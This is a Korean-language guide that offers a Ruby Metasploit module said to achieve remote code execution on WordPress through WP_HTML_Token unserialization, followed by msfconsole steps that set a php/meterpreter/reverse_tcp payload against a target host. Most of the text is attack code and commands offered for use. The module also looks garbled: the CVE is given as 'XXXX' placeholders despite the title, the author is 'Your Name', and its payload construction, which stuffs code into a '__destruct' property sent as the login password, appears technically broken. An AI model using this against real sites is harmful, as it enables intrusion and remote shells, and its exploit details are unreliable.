
WP_HTML_Token의 WordPress 역직렬화 취약점(CVE-2024-31211)을 악용하여 원격 코드 실행을 달성하는 Metasploit 모듈입니다.
WordPress에서 WP_HTML_Token 클래스의 인스턴스 역직렬화를 통해 RCE 취약점을 익스플로잇하는 Metasploit 모듈을 만들기 위해, 역직렬화 결함을 트리거하여 임의 코드 실행을 유도하는 페이로드를 구성하는 데 초점을 맞출 것입니다.
다음 코드를 Metasploit Framework 설치 디렉토리의 modules/exploits/multi/http 경로에 wordpress_wp_html_token_rce.rb로 저장하세요.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability in WordPress via
the unserialization of instances of the `WP_HTML_Token` class. This allows for
code execution via its `__destruct()` magic method.
},
'Author' =>
[
'Your Name' # OneArch
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-XXXX'], # Replace with the correct CVE number
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress <= 5.x', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
}
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
})
if res && res.code == 200 && res.body.include?('wp-login.php')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload to trigger unserialization vulnerability")
serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'
post_data = {
'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
'user_pass' => serialized_payload,
'wp-submit' => 'Log In',
'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
'testcookie' => 1
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
'vars_post' => post_data
})
handler
end
end
모듈 저장:
모듈을 Metasploit Framework 설치 디렉토리의 modules/exploits/multi/http 경로에 wordpress_wp_html_token_rce.rb로 저장하세요.
/path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
Metasploit 로드: 터미널을 열고 다음을 실행하여 Metasploit Framework를 시작합니다.
msfconsole
새 모듈 사용: Metasploit 콘솔에서 다음 명령을 사용하여 새 익스플로잇 모듈을 로드합니다.
use exploit/multi/http/wordpress_wp_html_token_rce
구성 및 실행:
RHOSTS, RPORT, TARGETURI, PAYLOAD와 같은 필요한 옵션을 설정한 후 모듈을 실행합니다.
msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
LHOST => your_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
이 Metasploit 모듈은 취약한 WordPress 인스턴스에 조작된 직렬화 페이로드를 전송하여 역직렬화 취약점을 트리거하고 임의 코드 실행을 달성하려고 시도합니다. 취약점의 특성과 대상 환경에 따라 페이로드와 모듈을 필요에 맞게 조정하세요.